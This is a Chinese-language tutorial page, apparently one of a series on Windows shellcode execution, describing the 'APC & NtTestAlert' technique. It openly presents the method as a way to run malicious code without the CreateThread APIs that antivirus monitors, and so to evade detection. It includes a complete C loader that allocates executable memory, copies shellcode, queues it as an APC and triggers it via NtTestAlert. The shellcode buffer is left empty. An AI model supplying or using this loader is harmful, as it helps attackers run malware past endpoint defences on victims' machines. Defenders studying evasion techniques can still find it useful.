APC & NtTestAlert Code Execute

APC & NtTestAlert代码执行

APC & NtTestAlert Code Execute简介

在Early Bird篇章介绍过,本质上是线程初始化时调用的为导出函数NtTestAlert函数清空APC队列导致的代码执行,那我们是不是可以直接调用这个函数进行代码执行呢？

这种技术并不依赖CreateThread和CreateRemoteThread等被杀软严格监控的API就能进行代码执行,也并没有直接操作恶意代码,而是触发操作系统(其实也是本进程)去帮我们执行这些恶意代码,这样也一定程度上逃避了检测。

执行流程

修改shellcode执行权限
获取NtTestAlert函数地址
插入APC队列
调用NtTestAlert

代码实现

#include <Windows.h>
#include<stdio.h>
char shellcode[]="";
typedef VOID(NTAPI* pNtTestAlert)(VOID);
int main() {

	pNtTestAlert NtTestAlert = (pNtTestAlert)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtTestAlert");

	LPVOID lpBaseAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	memcpy(lpBaseAddress, shellcode, sizeof(shellcode));

	QueueUserAPC((PAPCFUNC)lpBaseAddress, GetCurrentThread(), NULL);
	
	NtTestAlert();
	return 0;
}

LINKS

NTAPI Undocumented Functionsundocumented.ntinternals.net

上一页SEH Code Execute 下一页NtCreateSection & NtMapViewOfSection Code Execute

最后更新于5年前

hashtagAPC & NtTestAlert Code Execute简介

hashtag执行流程

hashtag代码实现

hashtagLINKS

APC & NtTestAlert Code Execute简介

执行流程

代码实现

LINKS